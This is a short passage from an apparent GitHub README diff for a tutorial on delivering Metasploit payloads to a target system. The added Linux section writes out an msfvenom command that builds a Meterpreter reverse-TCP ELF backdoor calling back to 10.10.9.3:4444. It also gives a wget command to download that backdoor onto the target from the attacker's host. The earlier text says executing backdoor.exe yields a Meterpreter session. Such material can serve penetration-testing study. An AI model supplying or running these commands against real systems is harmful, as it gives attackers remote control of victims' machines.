SavioFengGit/Trasferring-Malicious-Payload-MSFvenom-to-the-Target-System/README.md

 <img src="handler.png" width=50% height="auto"><br><br>
 **Execute the backdoor.exe on the Target and you got a Meterpreter Session on your Machine**

+### Linux System
+It's the same thing but u have to change the creation of payload and use another tool for download the file
+ - **Command to generate a malicious payload (reverse_tcp): msfvenom -p linux/meterpreter/reverse_tcp LHOST=10.10.9.3 LPORT=4444 -f elf > 'backdoor.elf' (set LPORT and LHOST where you want to receive the connection.
+Default is x86, if need x64, you have to specify it) <br>**
+ - **Download the payload with wget: wget http://10.10.9.3/backdoor.elf <br>**

 #Author